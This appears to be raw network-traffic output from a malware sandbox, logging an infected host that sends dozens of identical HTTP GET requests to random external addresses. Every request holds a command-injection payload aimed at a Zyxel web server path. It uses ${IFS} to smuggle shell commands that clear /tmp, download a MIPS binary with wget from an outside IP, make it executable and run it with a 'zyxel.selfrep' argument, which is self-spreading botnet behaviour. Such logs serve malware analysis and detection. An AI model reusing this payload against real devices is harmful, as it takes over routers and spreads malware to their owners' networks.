                                                  Jan 19, 2024 18:24:04.223704100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6575192.168.2.133789277.75.42.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223766088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6576192.168.2.135758645.94.40.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223817110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6577192.168.2.1335620180.61.138.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223855972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6578192.168.2.134512447.80.254.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223885059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6579192.168.2.135733879.36.192.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223944902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6580192.168.2.1349192186.220.203.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.223975897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6581192.168.2.135745492.32.236.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224014997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6582192.168.2.1360668130.203.216.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224050999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6583192.168.2.1352734152.245.176.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224092007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6584192.168.2.1335114114.60.18.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224114895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6585192.168.2.1355208102.171.234.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224147081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6586192.168.2.134618686.153.162.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224189997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6587192.168.2.1342276107.28.165.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224235058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6588192.168.2.1360420138.74.59.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224272966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6589192.168.2.1338676107.222.208.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224304914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6590192.168.2.1335754168.109.118.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224350929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6591192.168.2.135327219.243.116.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224381924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6592192.168.2.135697857.215.107.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224402905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6593192.168.2.1341982166.96.95.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224442005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6594192.168.2.1350486212.237.50.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224472046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6595192.168.2.1354810202.69.52.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224519968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6596192.168.2.133694859.34.188.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224569082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6597192.168.2.1341762123.41.28.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224603891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6598192.168.2.1358716106.219.17.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224641085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6599192.168.2.1349410194.197.68.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224678040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6600192.168.2.134381459.37.103.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224708080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6601192.168.2.1358236219.164.80.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224759102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6602192.168.2.135346668.146.81.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224786997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6603192.168.2.134414647.73.75.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224814892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6604192.168.2.134896082.80.152.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224869967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6605192.168.2.135456638.31.34.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224900961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6606192.168.2.1355466107.18.70.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224958897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6607192.168.2.1337770107.141.234.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.224976063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6608192.168.2.1344712114.221.25.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225043058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6609192.168.2.1339182188.230.128.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225068092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6610192.168.2.1352084187.96.72.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225111008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6611192.168.2.134361074.251.53.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225150108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6612192.168.2.136046037.184.249.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225177050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6613192.168.2.133857697.236.161.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225234985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6614192.168.2.1348696148.19.47.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225266933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6615192.168.2.1359626180.7.208.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225291014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6616192.168.2.134463613.141.74.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225354910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6617192.168.2.1334290103.240.142.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225393057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6618192.168.2.1337606211.47.19.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225415945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6619192.168.2.1350400212.79.212.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225460052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6620192.168.2.133570499.103.1.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225491047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6621192.168.2.134851879.32.153.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.225536108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6622192.168.2.136073048.148.212.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238130093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6623192.168.2.133719635.99.36.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238172054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6624192.168.2.135127667.167.53.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238209009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6625192.168.2.1357698213.21.152.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238240004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6626192.168.2.1333902150.106.141.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238270998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6627192.168.2.135253082.214.159.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238318920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6628192.168.2.1359642188.113.255.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238359928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6629192.168.2.135520835.229.138.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238394976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6630192.168.2.133723434.30.201.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238449097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6631192.168.2.133678825.10.140.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238492012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6632192.168.2.1342374159.179.134.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238523960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6633192.168.2.134633813.221.66.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238569975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6634192.168.2.135800027.37.39.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238600016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6635192.168.2.1344474199.96.12.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238604069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6636192.168.2.1352806218.96.62.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.238643885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6637192.168.2.1354320217.163.203.195443
                                                  TimestampBytes transferredDirectionData
